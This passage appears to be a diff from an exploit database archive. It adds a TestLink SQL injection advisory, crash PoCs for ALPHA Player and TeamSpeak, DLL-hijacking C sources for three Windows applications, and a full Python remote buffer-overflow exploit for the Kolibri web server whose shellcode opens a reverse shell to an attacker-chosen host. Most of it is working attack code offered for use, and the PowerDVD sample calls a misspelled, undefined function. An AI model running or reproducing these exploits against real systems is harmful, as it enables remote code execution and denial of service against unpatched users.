CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=<SQL Injection>&search=Search%2FFilter
</pre>
Vulnerability 2 (Fixed in patches after commit #7a09973 in official repository)
<pre>
POST /testlink/lib/events/eventinfo.php HTTP/1.1
Content-Length: 6
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: 192.168.56.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
DNT: 1
Connection: close
Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1; ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}
id=123<SQL Injection>
</pre>
Note:'Any user can create account for the application in 'testlink/firstLogin.php' page hence its possible to exploit aforementioned SQL injections without prior knowledge of the authentication details.'
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5308/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

32
platforms/windows/dos/34855.pl Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/44196/info
ALPHA Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
ALPHA Player 2.4 is vulnerable; other versions may also be affected.
===================================================
ALPHA 2 Player Local Crash PoC
===================================================
#Title: ALPHA 2 Player(.bmp) Local Crash PoC
#Author : anT!-Tr0J4n
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m
#thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Tested on: Windows XP sp3
# http://alpha2player.com/
==================================================
#!/usr/bin/perl
print "| ALPHA.bmp Local Crash |\n";
print "| Author: anT!-Tr0J4n |\n";
print "| Greetz :http://inj3ct0r.com |\n";
print "| www.Dev-PoinT.com |\n";
my $junk= "\x41" x 240 ;
open(file,">crash.bmp");
print file $junk ;
close(file);

60
platforms/windows/dos/34857.txt Executable file
View file

@ -0,0 +1,60 @@
#################################################################################################
#
# Title : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability
# Severity : High+/Critical
# Reporter(s) : SpyEye & Christian Galeone
# Software Version : 3.0.14 & Previous Versions
# Software Name : TeamSpeak Client
# Software Download Link : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe
# Vendor Home : http://teamspeak.com/
# Date(s) : 01/04/2014 - 0r161n4l c0d3 By SpyEye
# : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone
# Tested in : Win7 - TeamSpeak Client V3.0.14
# CVE(s) : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone
#
##################################################################################################
#
# Effects:
#
# Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel)
#
# Note:
#
# The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect.
#
# PoC:
#
# 1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye
#
# CVE: CVE-2014-7221
#
# [img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img]
#
# 2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone
#
# CVE: CVE-2014-7222
#
# [img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img][img][img]\\14\z[/img][/img][img][img]\\15\z[/img][/img][img][img]\\16\z[/img][/img][img][img]\\17\z[/img][/img][img][img]\\18\z[/img][/img][img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img]
#
# Fix:
#
# http://screech.me/ts3/plugins/antifreeze.html
#
# OR
#
# http://www.teamspeak.com/?page=downloads
#
# Original Source:
#
# http://r4p3.net/public/ts3bbcodefreeze.txt
#
# http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/
#
# Credit(s):
#
# SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r
#
# Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r
#
#
##################################################################################################

86
platforms/windows/remote/34844.c Executable file
View file

@ -0,0 +1,86 @@
source: http://www.securityfocus.com/bid/44128/info
STDU Explorer is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
STDU Explorer 1.0.201 is vulnerable; other versions may also be affected.
===================================================
STDU explorer DLL Hijacking Exploit (dwmapi.dll)
===================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
#stdu explorer DLL Hijacking Exploit (dwmapi.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software: http://www.stdutility.com/stduexplorer.html
#Tested on: Windows XP sp3
# Home : www.Dev-PoinT.com & http://inj3ct0r.com
=====================
How TO use : Compile and rename to " dwmapi.dll " , create a file in the same dir with one of the following extensions.
check the result > Hack3d
=====================
#dwmapi.dll (code)
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void DwmRegisterThumbnail() { evil(); }
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void DwmSetPresentParameters() { evil(); }
DLLIMPORT void DwmSetWindowAttribute() { evil(); }
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}

13
platforms/windows/remote/34846.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/44141/info
The 'httpdx' application is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view the source code of files in the context of the server process. This may aid in further attacks.
Versions prior to httpdx 1.4.6b are vulnerable.
The following example URI are available:
http://www.example.com/index.html.
http://www.example.com/test.py.
http://www.example.com/test.php.

70
platforms/windows/remote/34848.c Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/44163/info
1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code.
An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected.
/*
#One CLICK DVD Converter 2.1.7.1 DLL Hijacking Exploit (vsoscaler.dll ; swscale.dll ; dvd43.dll )
#Author : anT!-Tr0J4n
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Software : www.lgsoftwareinnovations.com
#Version : 2.1.7.1
#Tested on: Windows XP sp3
==========================
How TO use : Compile and rename to (vsoscaler.dll ; swscale.dll ; dvd43.dll ) , create a file in the same dir with one of the following extensions.
check the result -> 0wn3d
==========================
+ vsoscaler.dll
+ swscale.dll
+ dvd43.dll
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

41
platforms/windows/remote/34853.c Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/44193/info
PowerDVD is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
PowerDVD 5.00.1107 is vulnerable; other versions may also be affected.
/*
[*] Author: Inj3cti0n P4ck3t
[*] e-mail: fer_henrick@hotmail.com
[*] Date: 18/10/2010
[*] Name BUG: PowerDVD 5.00.1107 DLL Hijacking Exploit (trigger.dll)
[*] System tested: Windows XP (Version 5.1 Service Pack 3)
[*] PowerDVD.exe Version: 5.00.1107
[*] Software to Download: N?o dispon?vel
[*] Application Path: C:\Arquivos de programas\CyberLink\PowerDVD\PowerDVD.exe
[*] DLL Found => trigger.dll
Greetz: fvox
*/
#include <windows.h>
#include <stdio.h>
int testando()
{
MessageBox(0, "Testando PoC", MB_OK);
FILE *fp;
fp = fopen("Inj3cti0nP4ck3t.txt", "w");
fwrite("it works ;-)", 1, 12, fp);
fclose(fp);
exit(1);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
testandp();
return TRUE;
}

254
platforms/windows/remote/34856.py Executable file
View file

@ -0,0 +1,254 @@
#!/bin/python
import socket, sys, re
############################################################################################################
# Exploit Title: Kolibri POST Buffer overflow with EMET 5.0 and EMET 4.1 Partial Bypass
# Date: September 30th 2014
# Author: tekwizz123
# Vendor Homepage: http://www.senkas.com
# Software Download: http://www.senkas.com/kolibri/download.php
# Version: 2.0
# Tested on: Windows 7 32 bit, Windows 7 64 bit, Windows XP SP3
# CVE-ID: CVE-2014-5289
#
# This exploit will bypass all protections in EMET 5.0 and 4.1 but DEP.
#
# If you have any questions about the exploit, send a message to @tekwizz123 and I'll try help out.
#
# You may modify this exploit as you like for whatever purposes you like so long as my name (tekwizz123)
# appears as the original author of this exploit.
###########################################################################################################
# Basic check to see if we have the arguments we need
if len(sys.argv) < 6:
print "Usage: " + sys.argv[0] + " *target ip* *target port* *ip to connect back to* *port to connect back to* *target*"
print "Targets: "
print "1. XP SP2 32 bit"
print "2. XP SP3 32 bit"
print "3. Windows Vista and Later 32 bit or 64 bit"
exit(1)
# Set source ip and port and destination ip and port
targetip = sys.argv[1]
targetport = int(sys.argv[2])
localhost = sys.argv[3]
localport = int(sys.argv[4])
# Set the version of the remote machine so we can craft the correct exploit for it
target = int(sys.argv[5])
# Check if the version was valid or not
if (target != 1 and target != 2 and target !=3):
print "Error: Target was not valid"
# Define our check to see if the server is vulnerable
def check():
handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Checking if target is vulnerable....."
handle.connect((targetip, targetport))
handle.send("GET / HTTP/1.1\r\n")
resp = handle.recv(1024)
handle.close()
if re.search("server: kolibri\-2\.0", resp):
print "\nTarget is vulnerable\n"
else:
print "\nTarget is not vulnerable\n"
exit(0) # Exit the program before we continue
# And call it to check if the server is vulnerable
check()
# Define the code for the custom close socket loop
def addBufCloseSocketASM(buf):
#CloseSocket Call Loop.
"""This is very important as without this code, if we terminate the program for some reason,
the program doesn't free up the sockets it uses to listen for the connections to the server.
Therefore, we check from 0 to about 205 ish (I think, can't remember the exact number) and close all
of these sockets one by one. Since you can only close a socket associated with the program from which
you call the CloseSocket call, this will not affect other applications, and thus is a nice solution."""
buf += "\xBE\xA1\xF4\x6C\x01"
buf += "\x81\xEE\x01\x01\x01\x01"
buf += "\x8B\x36"
buf += "\x33\xFF"
buf += "\x33\xDB"
buf += "\x83\xC3\x50" * 7
buf += "\x3B\xFB"
buf += "\x7F\x06"
buf += "\x57"
buf += "\xFF\xD6"
buf += "\x47" # Increment the flipping counter before we loop around again with next instruciton.
buf += "\xEB\xF6"
return buf
def addSocketASM(buf):
#Socket call to set up a new socket, on working one this is is WS2_32.WSASocketA?
buf += "\xBB\x91\xF4\x6C\x01"
buf += "\x81\xEB\x01\x01\x01\x01"
buf += "\x8B\x1B"
if target == 3:
buf += "\x81\xC3\x79\x8E\x01\x01"
buf += "\x81\xEB\x01\x01\x01\x01"
if target == 2:
buf += "\x81\xC3\xEB\x09\x11\x10"
buf += "\x81\xEB\xD6\xE8\x10\x10"
if target == 1:
buf += "\x81\xC3\x95\x77\x01\x01"
buf += "\x81\xEB\x79\x56\x01\x01"
buf += "\x33\xC9"
buf += "\x51\x51\x51\x51"
buf += "\x41\x51\x41\x51"
buf += "\xFF\xD3"
return buf
def addConnectCallASM(buf):
#Connect call
buf += "\xBB\xA5\xF4\x6C\x01\x81\xEB\x01\x01\x01\x01\x8B\x1B\x68"
# Set the IP to connect back to within the shellcode, thanks to http://stackoverflow.com/questions/12638408/decorating-hex-function-to-pad-zeros
# this should now work with all IP addresses.
hostString = str(localhost).split(".")
buf += "{0:#0{1}x}".format(int(hostString[0]),4)[2:4].decode('hex')
buf += "{0:#0{1}x}".format(int(hostString[1]),4)[2:4].decode('hex')
buf += "{0:#0{1}x}".format(int(hostString[2]),4)[2:4].decode('hex')
buf += "{0:#0{1}x}".format(int(hostString[3]),4)[2:4].decode('hex')
# Some static bytes in the shellcode
buf += "\xB9\x02\x01"
# The the port to connect back on in the shellcode
hexPort = hex(localport)
buf += hexPort[2:4].decode('hex')
buf += hexPort[4:].decode('hex')
# Finish the last of the Connect call shellcode
buf += "\xFE\xCD\x51\x8B\xCC\x8B\xF0\x33\xC0\xB0\x16\x50\x51\x56\xFF\xD3"
return buf
def addExitProcessASM(buf):
#ExitProcess Call
buf += "\xBF\x15\xEE\x6C\x01\x81\xEF\x01\x01\x01\x01\x8B\x3F\xFF\xD7"
return buf
##########################################################################################################################
# This section is responsible for doing a standard stack overflow against XP targets to get around SEHOP issues not present
# with the Windows 7 version for some reason.
##########################################################################################################################
if (target == 1 or target == 2):
buf = ""
# Add the close socket assembly to the buffer variable
buf = addBufCloseSocketASM(buf)
# Add the socket assembly to open up a new socket
buf = addSocketASM(buf)
# Add the assembly to connect back to our host
buf = addConnectCallASM(buf)
#CreateProcessA call
buf += "\x33\xC9\xB1\x54\x2B\xE1\x8B\xFC\x57\x33\xC0\xF3\xAA\x5F\xC6\x07\x44\xFE\x47\x2D\x57\x8B\xC6\x8D\x7F\x38\xAB\xAB\xAB\x5F\x33\xC0\x8D\x77\x44\xB9\x64\x6E\x65\x01\x81\xE9\x01\x01\x01\x01\x51\x8B\xCC\x56\x57\x50\x50\xBA\x10\x10\x10\x18\x81\xEA\x10\x10\x10\x10\x52\x40\x50\x48\x50\x50\x51\x50\xBE\xFD\xED\x6C\x01\x81\xEE\x01\x01\x01\x01\x8B\x36\xFF\xD6"
# Add ExitProcess shellcode
buf = addExitProcessASM(buf)
overflow = "A" * 515
if target == 2:
overflow += "\x7B\x46\x86\x7C" #7C86467B on Windows XP SP3 = JMP ESP
if target == 1:
overflow += "\xED\x1E\x94\x7C" #7C941EED on Windows XP SP2 = JMP ESP
overflow += buf
########################################################################################################
# This section of the exploit deals with the Windows 7 version of the exploit
########################################################################################################
if (target == 3):
# Start defining our shellcode into the buf variable, starting with the tag for our egghunter:
buf = "\x43\x44\x44\x45\x43\x44\x44\x45"
# Add the close socket assembly to the buffer variable
buf = addBufCloseSocketASM(buf)
#Socket call to set up a new socket, on working one this is is WS2_32.WSASocketA?
buf = addSocketASM(buf)
# Add the assembly to connect back to our host
buf = addConnectCallASM(buf)
#CreateProcessA call
buf += "\x33\xC9\xB1\x54\x2B\xE1\x8B\xFC\x57\x33\xC0\xF3\xAA\x5F\xC6\x07\x44\xFE\x47\x2D\x57\x8B\xC6\x8D\x7F\x38\xAB\xAB\xAB\x5F\x33\xC0\x8D\x77\x44\xB9\x64\x6E\x65\x01\x81\xE9\x01\x01\x01\x01\x51\x8B\xCC\x56\x57\x50\x50\xBA\x10\x10\x10\x18\x81\xEA\x10\x10\x10\x10\x52\x40\x50\x48\x50\x50\x51\x50\xBF\xFD\xED\x6C\x01\x81\xEF\x01\x01\x01\x01\x8B\x3F\xFF\xD7"
# Add ExitProcess shellcode
buf = addExitProcessASM(buf)
# The legendary WoW64 egghunter created by Lincoln. Greetz mate, you've done a brilliant job with this :)
# One should also note, if the target has EAF enabled, this egghunter will take longer to run
egghunter = (
"\x33\xD2" # XOR EDX, EDX to start the search from the beginning of memory, a la 00000000.
"\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xea\xb8"
"\x43\x44\x44\x45" # tag to search for
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf\x90\x90")
overflow = "A" * 12
overflow += "A" * (790 - len(overflow) - len(egghunter))
overflow += egghunter
overflow += "A" * 2
overflow += "\xEB\x99" # NSEH overwrite
overflow += "\xD1\x87\x44" #SEH overwrite 004487D1 aka xor pop pop ret from the binary itself.
# Define our buffer for the exploit
buffer = "POST /" + overflow + " HTTP/1.1\r\n"
buffer += "User-Agent: Wget/1.13.4\r\n"
buffer += "Host: " + buf + "\r\n"# change this!
buffer += "Accept: */*\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: 4"
buffer += "\r\n\r\n"
buffer += "licenseID=string&content=string¶msXML=string"
# Set up the handle and connect to the target, the send the buffer and close the connection
handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Connecting to the target......"
handle.connect((targetip, targetport))
print "Sending evil buffer....."
handle.send(buffer)
handle.close()
# Print out details about the expected waiting time for the egghunter to work.
print "\nWe are now done."
print "If targeting XP, your shell will be instant"
print "If targeting Windows Vista and later, you will recieve your shell within 6 seconds if the target has not enabled EAF protection"
print "Otherwise, if the target has enabled EAF protection, expect your shell within 35 seconds."